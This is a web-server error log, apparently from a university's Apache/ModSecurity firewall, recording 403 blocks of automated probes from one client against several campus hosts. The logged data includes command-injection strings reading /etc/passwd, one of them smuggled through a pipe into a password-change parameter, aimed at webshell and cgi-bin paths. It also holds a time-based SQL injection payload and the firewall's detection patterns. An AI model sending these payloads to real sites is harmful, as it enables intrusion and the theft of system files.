[Tue Aug 29 11:33:36.333513 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAANsAh4AAAAD"]
[Tue Aug 29 11:33:36.334635 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARt--IAAAAV"]
[Tue Aug 29 11:33:36.336997 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARLXzIAAAAQ"]
[Tue Aug 29 11:33:36.352270 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARy-vwAAAAb"]
[Tue Aug 29 11:33:36.372581 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAQAAAAS"]
[Tue Aug 29 11:33:36.393485 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARNlAUAAAAS"]
[Tue Aug 29 11:33:36.451026 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11IMCo-f0AAARy-v4AAAAb"]
[Tue Aug 29 11:33:37.313279 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAANsAiEAAAAD"]
[Tue Aug 29 11:33:37.323297 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASBXQ0AAAAM"]
[Tue Aug 29 11:33:37.329605 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARo80wAAAAT"]
[Tue Aug 29 11:33:37.332256 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAANsAiIAAAAD"]
[Tue Aug 29 11:33:37.336662 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARA7iAAAAAA"]
[Tue Aug 29 11:33:37.343591 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASAHa4AAAAH"]
[Tue Aug 29 11:33:37.364866 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASAHa8AAAAH"]
[Tue Aug 29 11:33:37.372021 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARLXzgAAAAQ"]
[Tue Aug 29 11:33:37.375156 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARo804AAAAT"]
[Tue Aug 29 11:33:37.379712 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARQ3-wAAAAB"]
[Tue Aug 29 11:33:37.380468 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARt--kAAAAV"]
[Tue Aug 29 11:33:37.385443 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAASBXRAAAAAM"]
[Tue Aug 29 11:33:37.386832 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAASAHbAAAAAH"]
[Tue Aug 29 11:33:38.395869 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAASBXRMAAAAM"]
[Tue Aug 29 11:33:38.423224 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAASAHbQAAAAH"]
[Tue Aug 29 11:33:38.431749 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAAOJKfsAAAAE"]
[Tue Aug 29 11:33:38.460065 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81MAAAAT"]
[Tue Aug 29 11:33:38.547382 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81cAAAAT"]
[Tue Aug 29 11:33:38.548320 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAANsAi0AAAAD"]
[Tue Aug 29 11:33:39.301359 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11I8Co-f0AAASBXRUAAAAM"]
